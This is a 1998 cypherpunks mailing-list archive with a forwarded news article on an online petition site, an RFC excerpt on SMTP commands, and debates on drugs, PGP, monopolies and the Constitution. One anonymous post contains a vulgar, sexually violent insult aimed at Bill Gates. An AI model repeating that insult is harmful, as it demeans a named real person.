generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.












**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 3 Oct 1998 18:38:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Got a Cause and a Computer? You Can Fight City Hall
Message-ID: <199810032340.QAA27817@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Got a Cause and a Computer? You Can Fight City Hall
Date: Sat, 03 Oct 1998 10:17:14 -0500
To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/yr/mo/day/news/national/interactive-townhall.html

October 3, 1998

Got a Cause and a Computer? You Can Fight City Hall

By RICK LYMAN

AUSTIN, Texas -- Bill Clinton seems to have generated the most
petitions, calling for him to be impeached, to resign, to be left
alone. Thirteen people have signed one demanding a ban on tigers and
other exotic cats as pets. Eight favor the establishment of areas in national
parks for nudists. But a petition demanding statehood for New York City
attracted not a single signatory, not one, not even Donald Trump. 

In that dark epoch between the discovery of fire and the discovery of the
World Wide Web, the Bolsheviks had to storm the Winter Palace to get
their point across. 

Now it can all be done with the gentle click of a mouse button. 

"I got the idea when I was sitting at home in Austin watching a city
council debate on cable television," Alex Sheshunoff, 24, said. "The issue
they were discussing was very important, but the debate was really
boring, enough to induce narcolepsy. I started wondering: How can you
get citizens involved in the democratic process when they don't have time
to spend three hours at a city council meeting waiting to make a
three-minute statement?" 

His answer: E-The People, which describes itself as "America's
Interactive Town Hall" and resides in cyberspace at
www.e-thepeople.com. 

Those who find their way to the Web site, either directly or through one
of the newspapers or nonprofit agencies that are Sheshunoff's partners,
are given the chance to sign a petition already posted on the site, create a
new petition or write a letter to government officials about whatever is
stuck in their craw. 

"There have been a lot of people talking recently about the intersection of
democracy and the Internet," Sheshunoff said, "but not a lot of people
sitting down and writing the code. That's where we come in." 

E-The People has been open since August but is still trying to "stomp out
the last of the bugs," Sheshunoff said, and should be fully operational in a
month or so. 

The Web site, which also bills itself as "an Alex Sheshunoff Initiative," is
designed to connect citizens with their government officials, local or
national, and to turn a profit for Sheshunoff and his investors. 

For example, a Houston resident interested in protesting about the
environment is led through a process of identifying whom he should
contact (a click calls up a list that includes the governor, lieutenant
governor, city council representative, 26 state representatives, eight state
senators and 20 agency officials with specific responsibility for the
environment). 

Then the resident can compose a message that is automatically sent as
e-mail to whichever officials are selected, or as a fax, if the recipient has
no e-mail address. It is all free for the petitioners and letter writers.
Advertisers and media partners pay the freight. 

Messages can also be sent to the White House or to Congress,
Sheshunoff said, but the central intent is to address local issues. 

"The president already received a half-million e-mails a month, but for a
city council member to receive 10 letters on a single subject can have a
real impact," he said. "This is really about local people solving local
problems." 

The letters are treated as private mail, Sheshunoff said. E-The People
takes no note of their content and promises it will sell none of the
demographic data that might be collected in the process. 

Sheshunoff's initiative operates from an office on the 19th floor of a tower
in downtown Austin, part of a suite of offices that are home to Alex
Sheshunoff Management Services, the company run by his father, a
well-known banking consultant. 

The younger Sheshunoff prowled his small room recently, a thatch of
sandy hair brushing his forehead, occasionally grabbing for a purring
cellular telephone while a team of young programmers hunched over
keyboards frantically tapping in data. An American flag dominated one
wall while a map of the United States filled another, showing the route of
an 80-city transcontinental bus tour that Sheshunoff has been running to
spread the word. 

The bus, decorated to resemble a mailbox, left Austin on Aug. 1 and has
made its way across the Southwest, up the Pacific Coast and across the
prairies into the Midwest, New England and New York. It is heading
south on its return to Texas. 

So far, 45 newspapers have agreed to go into partnership with E-The
People, meaning they will feature a link to the site on their own Web
pages and share with E-The People any advertising revenues generated
by surfers traversing that link. Among those signed up are The San
Antonio Express-News, The Oregonian in Portland and The Daily News
in New York. Sheshunoff is hoping for 100 media partners. 

Sheshunoff once considered a career in network television. While a
student at Yale, he did some work for ABC News, as a production
assistant and then reading his own short, personal essays in the wee
hours. Then he read somewhere that the audience for network television
news had dropped 30 percent since 1990. 

Sheshunoff said he spent his senior year "thinking about where news was
going." This led him, as it has hundreds of others in his generation, to the
Internet. 

His first effort was an online magazine developed as a way of allowing
readers to pinpoint the restaurants and other venues nearest their homes.
"We sold some of that underlying technology to newspapers and others,
for their Web pages," he said. 

A similar process is used in E-The People, he said, but it is more
sophisticated. 

"It's not as easy as it sounds," he said, "to take somebody's address and
tell them who their elected officials are." 

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 3 Oct 1998 19:02:05 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: [SoftSpeech] Interplay between Crypto Export Regs and Copyright (fwd)
Message-ID: <199810040006.TAA29546@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 3 Oct 1998 23:53:01 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: [SoftSpeech] Interplay between Crypto Export Regs and Copyright

> Recall PRZ himself did not export anything, and yet the Feds were
> building the case on the basis that he allowed it to be exported, or
> did not try hard enough to prevent it being exported.  Rumor has it
> that a low profile cypherpunk type, Kelly Goen, had something to do
> with it, and he was the lesser publicized 2nd defendent in the USG
> investigation of PRZ and associate.

If this approach is so air-tight why is PRZ still walking around a free man?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 3 Oct 1998 13:39:22 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Is the .to (Tonga) domain completely rogue and should be removed?
Message-ID: <199810031841.UAA06353@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Read RFC 1123, section 5.2.3. 

      5.2.3  VRFY and EXPN Commands: RFC-821 Section 3.3

         A receiver-SMTP MUST implement VRFY and SHOULD implement EXPN
         (this requirement overrides RFC-821).  However, there MAY be
         configuration information to disable VRFY and EXPN in a
         particular installation; this might even allow EXPN to be
         disabled for selected lists.

         A new reply code is defined for the VRFY command:

              252 Cannot VRFY user (e.g., info is not local), but will
                  take message for this user and attempt delivery.

         DISCUSSION:
              SMTP users and administrators make regular use of these
              commands for diagnosing mail delivery problems.  With the
              increasing use of multi-level mailing list expansion
              (sometimes more than two levels), EXPN has been
              increasingly important for diagnosing inadvertent mail
              loops.  On the other hand,  some feel that EXPN represents
              a significant privacy, and perhaps even a security,
              exposure.

VRFY is hardly an "incorrect SMTP command."

>Your reasoning as to why its responses to incorrect SMTP
>commands constitutes evidence that the .TO domain is "negligent",
>"mismanaged" and "an attractive resource for criminal activities"
>is ironically incorrect. In fact, having an *unsecured* port 25 open to mail
>relaying would be negligent.

>Best regards,

>- Eric Gullichsen
>  Tonic Corporation
>  Kingdom of Tonga Network Information Center
>  http://www.tonic.to
>  Email: egullich@tonic.to








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sun, 4 Oct 1998 01:06:01 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: importance of motivation
In-Reply-To: <v04011716b23bc9b09817@[139.167.130.249]>
Message-ID: <000201bdef5e$06345860$3a8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Robert Hettinga:

: However, I *do* know that when I take ritalin, I can do boring stuff much
: easier. I'm a very grouchy bastard, but the boring stuff gets done. And, a
: very large percentage of people with the DSM-V "diagnosis" of ADHD (H, for
: "hyperactive", is Tim's lost initial there, probably a Freudian slip ;-)),
: also focus better with ritalin or dexedrine in their bloodstreams, at least
: in clinical trials. I also know that when you run PET scans
: of people who have ADD (I'm not as hyperactive as I was as a kid...) their
: brains look markedly different from those of  "normal" people when they try to
: concentrate on something too long.
....................................................................................


I notice that when I'm intoxicated with various fermented substances, I'm much less inhibited about
everything and more amenable to doing things I would otherwise examine with critical judgement.  <g>

Many people come to depend on these props for their motivation and find they can't function without
them.  That's the problem, and it's recognizeable in regards to alcohol and recreational drugs, but
apparently not so identifiable with the sanctioned, prescribed ones.   They temporarily boost the
system and the person can function, minus a few little negative, annoying, possibly dangerous,
complications.   But they don't strengthen the person's system, they  don't have noticeably
beneficial effects on the person's physical system (they way food does, for instance).

Sometimes I've pondered just what the difference is between any kind of drug or any kind of food or
other 'natural' chemical that we take into our bodies (such as water or oxygen), which we normally
use to function.   These things circulate through us and we incorporate some of them and
exude/excrete/eliminate the others.   If we don't get oxygen quickly, or water very soon, or food
eventually, our strength wanes and we die (and it's also possible to "OD" on water).   With stuff
like cocaine or heart medicine, a person suffers extremely and/or dies just the same

An important difference I can identify is the effects upon our strength and ability from the use of
any chemical we consume.  Anything which leaves us weak:  Bad.    Strength, self-reliance, efficacy:
Good.

But the most important difference is the quality of one's conscious state: the more, the better -
greater clarity over one's circumstance, greater control possible over one own functions and things
around one, a better sense of being "oneself", under one's own direction (authority).

The less of this, the more is lost (as in 'loser').
You have to "be" there, to get it.


    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sun, 4 Oct 1998 01:06:06 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: importance of motivation
In-Reply-To: <199810031436.KAA00893@camel7.mindspring.com>
Message-ID: <000301bdef5e$0bddee20$3a8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From John Young:

: 'Twould be nice if rationality waned for a generation or
: many, give us time to recover from being overdosed with
: it since the ahem Renaissance, and suffering the damage of
: Renaissance Persons with pseudo-mastery of more than
: they know how to handle except to blow the shit out of a
: world they cannot truly comprehend except as a clueless
: wad defying self-annointe High IQers.
..........................................................................


You are mistaken, John.   I won't say it depends upon what your definition of "is", is, but ...
rationality is not the opposite of sanity.  I think you're really thinking about coerced
intelligence, as practiced in the public schools and various places of presumptions to authority.
That is not the intended meaning of the word.   Being rational has nothing to do with imposing one's
methods on others.   Rationality, which would support one's own, also prevents the motivation
towards disturbing another's peace.   Rather should you blame the lack of perspective and the
problems of a disturbed psychology.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KCzzzzz@aol.com
Date: Sat, 3 Oct 1998 23:43:21 +0800
To: cypherpunks@toad.com
Subject: Please include me
Message-ID: <80e9319b.3616faed@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Include me on your mailing list 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 4 Oct 1998 00:16:25 +0800
To: "Cypherpunks" <bill.stewart@pobox.com>
Subject: Q to cypherpunks.    WAS:Re: Please stop forwarding Canadian Firearms Digest to Cypherpunks List!
Message-ID: <199810040511.BAA20165@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Q for you CPunks: did PGP v.5.5.3i was truly peer-reviewed for flaws or 
backdoors?  If not, which is that last version that was?


On Sat, 03 Oct 1998 14:20:42 -0700, Bill Stewart wrote:

>Hi!  Of course most of us believe that firearms registration is wrong
>and that the right to own weapons is the right to be free,
>and I suppose it is a break from Clinton&Monica rants,
>but still, please stop forwarding the Canadian firearms stuff to
>the cypherpunks list.  

Is is not about the right to be free, it is about govt organizing seriously to 
deny that right.   :-S


OK, I'll stop.  No problemo Bill.  OTOH, I will still post articles with 
relevance to crypto from the list or elsewhere.

Some of thoses articles will possibly have nothing to do with crypto except 
that they will be modifications or subtleties of ITAR.

Just so you know: I spend a lot of keystrokes teaching PGP to various peoples 
nowadays...

Ciao all C'Punks.

jfa


Jean-Francois Avon, Pierrefonds (Montreal), Canada

Unregistered Firearms in the hands of honest citizens: Liberty's Teeth
Strong Cryptographic tools in the hands of honest citizens: Liberty's Voice

He who beats his sword into a ploughshare will get coerced to plow for 
those who don't...

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sun, 4 Oct 1998 04:39:13 +0800
To: "'cypherpunks'" <cypherpunks@cyberpass.net>
Subject: Dial 1-800-SPY TECH
Message-ID: <000401bdef7b$c04057a0$3a8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



I was surfing the web, looked at http://www.spaceinvestor.com/, when I noticed an article with the
above title, referring to this company:

Applied Signal Technology (APSG)
Spy vs Spy gadgetry for the 21st Century. This company is the quality producer of surveillance
equipment and is on track for consistent revenue gains of 15 - 20%...
(also see Quarterly Earnings Report)


Copied below are a couple of paragraphs about the company:

In actuality the new Spy is a technological marvel of electronic hardware, computers, and software,
that manifests into the latest high tech signal reconnaissance equipment. And the best of these new
Techno-Bonds that process, evaluate, and store wireless telecommunications signals are produced by a
small Silicon Valley company called Applied Signal Technology.

Applied Signal Technology, stock ticker symbol: APSG, is a leader in the growing niche market of
signal reconnaissance. Applied Signal Technology designs equipment to collect and process foreign
telecommunication signals. The company's products include equipment that scans cellular-telephone,
microwave, ship-to-shore, and military-radio-frequency transmissions; computer-based processing
equipment then evaluates collected signals and selects those likely to contain relevant information.
Over 95% of the company's revenue is derived from purchases by United States government agencies
under contracts.
[....]
Investors should consider adding APSG to their long term portfolio. It has positive characteristics
of a stock ready to surge higher. Hopefully an APSG stock price increase will become the sequel to
"The Spy who loved me".


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 3 Oct 1998 19:50:30 +0800
To: cypherpunks@Algebra.COM
Subject: Microsoft
Message-ID: <199810040052.CAA01147@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I'd always wondered how Bill Gates could shit with that pole so far up his ass. 
Then I realized: The pole is too long to be completely embedded in his ass and 
he uses the other half of it to rape computer users everywhere on a regular 
basis. And since the pole is crammed in his ass he can't shit, so he just 
retains his shit, making him incredibly anal retentive. I'm sure he enjoys
this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rain Dog" <rain_dog_@hotmail.com>
Date: Sun, 4 Oct 1998 05:38:12 +0800
To: cypherpunks@cyberpass.net
Subject: Ordered to be celibate?
Message-ID: <19981004103730.4452.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




Judge Orders Teen To Be Celibate

CAMBRIDGE, Ill. (AP) -- A teen-ager who pleaded guilty to stealing 
handguns
must remain celibate for 2 1/2 years unless he gets married, a judge 
said.

Brandon Stevens, 17, was sentenced Wednesday to 30 months probation, 180 
days
in jail and a $2,000 fine. Henry County Judge Clarke Barnes said Stevens 
won't
have to serve jail time if he completes treatment at a halfway house and 
meets
conditions that include the celibacy rule.

``Certainly he's got no business having sexual relations with people to 
whom
he's not married,'' Barnes said.

Prosecutor Ted Hamer said the requirement was based on the judge's 
learning in
court that Stevens was sexually active, not because of any sexually 
related
charges.

The American Civil Liberties Union said Stevens' sex life is none of the
judge's business.

And it's not clear how to enforce Barnes' order.

``It's sort of a self-policing type of order,'' Hamer said. ``Nobody's 
going
to be spying on him or looking in windows. I think the judge just hopes 
he'll
abide by the order.''



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@earth.wazoo.com>
Date: Sun, 4 Oct 1998 00:11:26 +0800
To: cypherpunks@toad.com
Subject: Re: Please include me
In-Reply-To: <80e9319b.3616faed@aol.com>
Message-ID: <199810040506.FAA29119@earth.wazoo.com>
MIME-Version: 1.0
Content-Type: text/plain



  > Include me on your mailing list

Me too!!!!

-- an anonymous AOL31 user




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@earth.wazoo.com>
Date: Sun, 4 Oct 1998 01:22:15 +0800
To: cypherpunks@toad.com
Subject: Re: Please include me
Message-ID: <199810040616.GAA30836@earth.wazoo.com>
MIME-Version: 1.0
Content-Type: text/plain



piss off!

ME FIRST!

>From cypherpunks-errors@toad.com Sat Oct  3 22:43:06 1998
>Date: Sun, 4 Oct 1998 05:06:01 GMT
>Message-Id: <199810040506.FAA29119@earth.wazoo.com>
>From: Anonymous <nobody@earth.wazoo.com>
>Comments: This message did not originate from the Sender >address above.
>It was remailed automatically by anonymizing remailer software.
>Please report problems or inappropriate use to the
>remailer administrator at <wazoo@wazoo.com>.
>Subject: Re: Please include me
>References: <80e9319b.3616faed@aol.com>
>To: cypherpunks@toad.com
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk

>  > Include me on your mailing list

>Me too!!!!

>-- an anonymous AOL31 user




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 08:23:48 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810041326.IAA30916@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Brown, R Ken" <brownrk1@texaco.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Fri, 2 Oct 1998 05:28:08 -0500 

> I don't believe there are that many natural monopolies  Where there *are*
> natural monopolies it is because the entry cost is higher than any likely
> profit.

There are some additional issues involved other than start-up cost. Such
things as market saturation and information hording.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 08:27:48 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810041331.IAA30976@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Fri, 2 Oct 1998 02:43:25 -0700 

> One thing that has changed fundamentally in the Information Age is the
> ability for the consumer to get informed -- the ease if information
> publishing and retrieval and the inability to control it.

Actualy you are ascribing an effect as the cause. The information is there
because the holders believe it's in their best interest to dissiminate it.
As companies (the US Army' current behaviour is a good example) become to
respect the distribution capability of the internet you'll see a reduction
of information available.

> Reputation has
> more value then ever.

Malarky. Reputation is irrelevant, just examine the prisoners delima.
Those who put reputation over action are setting themselves up for a classic
abuse of trust.

> Government cannot protect people from their own decisions, and should
> not have the right to take those decisions away.

> I wouldn't eat at McDonalds even with all the regulation.

You've got to be married or have lots of free time...;)

> More often than not regulation is a false sense of security, and often
> protects companies from legitimate liability (although god knows our
> liability/tort system is completely out of whack).

More often that not regulation is the result of abuse of the market by a
manufacturer and is imposed ex post facto. It's intent is to eliminate
future abuses.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 08:31:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810041334.IAA31037@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 01 Oct 1998 22:28:49 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> Bullshit.  No monopoly has ever happened except by regulation

That is truly Bullshit.

Microsoft got to where it is because of a lack of regulation, the abuses of
the aircraft industry  in the 1940-50's that led to regulation at the end of
the 50's and 60's. The steel industry in the north east in the early 1900's.
The food packing and garment industries of the north east and pacific coast
in the 20's through the 50's. The railroad industry in the mid-1800's.

Every one of these created a monopolistic market because of a *lack* of
regulation.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 08:57:35 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810041400.JAA31111@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Fri, 2 Oct 1998 02:26:21 -0700 

> > In what way are the resulting markets different from
> > either the producers or consumers view?
> 
> Views on intellectual property and the obvious marketplace changes due
> to an IP or lack of IP framework would be the major difference IMHO. I

Explain further, from your description of the differences there are no
fundamental mentionings or views of intellectual property. As a matter of
fact the specific role of the individual is never even mentioned in either
definition.

It's almost like there is something poping out of thin air...

> > Explain further what you mean by abolition of force is a 
> > prerequisite please.
> 
> Basically no person (or entity) can use force (or its derivatives)
> against another person (or entity). Your long history of criminal law,
> except stripped of all victimless crimes.

So people don't have a right to self-defence? I agree consensual crimes are
not crimes.

> > And what specificaly do you mean by proper role of government?
> 
> "What, then, is law? It is the collective organization of the individual
> right to lawful defense. 

Is it? Or is it simply another sort of coercion to cooperate with the
collective? Is it not actualy the embodyment of ideals, an attempt at utopia
if you will?

> Each of us has a natural right--from God--to defend his person, his
> liberty, and his property. These are the three basic requirements of
> life, and the preservation of any one of them is completely dependent
> upon the preservation of the other two. For what are our faculties but
> the extension of our individuality? And what is property but an
> extension of our faculties? 

I'm interesting to see how you reconcile the belief nobody has a right to
use force yet has a right to defend their life.

By facluty I assume you mean our emotional and psychological makeup coupled
with our sensory record of them.

I'd say that such issues are not a facet of individualism but rather a
characteristic of life itself.

As to property, it is a consequence of our biology, if that is a consequence
of our faculties, and not visa versa, I'd doubt.

> If every person has the right to defend -- even by force -- his person,
> his liberty, and his property, then it follows that a group of men have
> the right to organize and support a common force to protect these rights

No it doesn't. You must first prove that a group of individuals have some
right that as individuals they don't have. For one thing, even in your
definition, rights are a fundamental aspect of birth as an individual.

Something I've yet to see.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 09:01:48 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810041405.JAA31171@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 01 Oct 1998 22:33:24 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> In america the various mafias get plently of competition,
> mostly by means short of actual warfare.  Coke is a free
> market except for police intervention, and the local church
> is most certainly not a monopoly.

Coke is a free-market? That's a laugh. I suggest you study the history of
the Crips and related gangs, or the international Coke distributors. At no
time was there more than a dozen or so groups and they worked cooperatively
in many cases. As to the 'various mafias', in case you hadn't heard, they've
been organized and integrated for about 30-40 years depending on who you ask.
They cooperatively divide up territories and product lines between them to
guarantee a minimum of violence and maximize profit for each member. However,
I would lay dollars to donuts that if you were to go start your own family
there would be very little consideration as to the consequences.

Make no bones about it, if we're talking national or international crime it
is most definitely organized and cooperatively arranged between a small set
of players. That's a monopoly.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 09:05:33 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810041408.JAA31231@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 01 Oct 1998 22:33:24 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)

> market except for police intervention, and the local church
> is most certainly not a monopoly.

Your local church is a member of a larger international collective that does
in fact use coercion in one form or another.

Consider the consequences of abortion for a Catholic (true believer). Tell
that to the various hospices and clinics that have been blown to kingdom
come...

Coercion is a much broader stroke than a simple assault. It can include real
and imagined consequences to alter or limit the behaviour of others.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 4 Oct 1998 09:15:42 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: IP: Clear and present danger: FIGHT AGAINST NATIONAL ID CARD (fwd)
Message-ID: <199810041418.JAA31300@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 02 Oct 1998 21:42:38 +0200
> From: "Albert P. Franco, II" <apf2@apf2.com>
> Subject: IP: Clear and present danger: FIGHT AGAINST NATIONAL ID CARD
>   (fwd)

> I think the original message speaks of executive, legislative, and judicial
> branches. As defined by the constitution this is, in fact, the federal
> government.

> As a matter of practice, most if not all, of the states are
> also divided this way. Article X which you quoted supports the tacit
> understanding that We, the people, are not actually THE government.

Really? Please expound...

We, the People of the United States, in order to form a more perfect Union, 
establish Justice, insure domestic Tranquility, provide for the common 
defence, promote the general Welfare, and secure the Blessings of Liberty to 
ourselves and our Posterity do ordain and establish this Constitution for the 
United States of America. 

				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 
  
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 
 -------------------------------------------------------------------------

It in fact supports NO such interpretation unless you take it out of context
and alone. Much like trying to determine the ecology of a valley by
examinging a single fish...

In fact what it does say is that the Constitution was implimented by the
people and not by a government *granting* rights and privileges. It futher
states that it does not limit the rights or privileges of the people (note
it doesn't mention federal or state govts.) futher backing up that we the
people are implimenting this and not the other way around. Finaly it
specificaly states that the order of resolution for any issue is to see if
it's specificaly given to the federal govt., if not (and it's not
prohibited), then to the states (to resolve via their own representative
systems), and finaly if not covered by those two documents (the US
Constitution and the individual state constitution) then it is retained by
the people.

So we find that in fact we the people *are* the initial and final authority.

The bottem line is that *the government of the United States* consists of
three parties, the federal system, the state, and the people. That is the
government of this country and not some figmented heirarchy that has zero
basis for support.

